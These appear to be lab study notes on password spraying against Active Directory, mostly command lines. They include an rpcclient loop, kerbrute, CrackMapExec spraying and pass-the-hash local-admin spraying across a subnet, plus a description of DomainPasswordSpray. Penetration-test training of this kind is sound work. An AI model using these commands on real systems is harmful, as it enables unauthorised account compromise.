Linux

Rpcclient is an excellent option for performing this attack from Linux.

An important consideration is that a valid login is not immediately apparent with rpcclient, with the response Authority Name indicating a successful login.

We can filter out invalid login attempts by grepping for Authority in the response.

The following Bash one-liner (adapted from here) can be used to perform the attack.

Bash one-liner

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

CrackMapExec & Filtering Logon Failures

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Validate Creds

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

Local Admin Spraying Using NTLM Hash

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Windows

the DomainPasswordSpray tool is highly effective.

DomainPasswordSpray Tool

• Authenticated to the Domain:
  • The tool automatically generates a user list from Active Directory.
  • Queries the domain password policy.
  • Excludes user accounts within one attempt of locking out.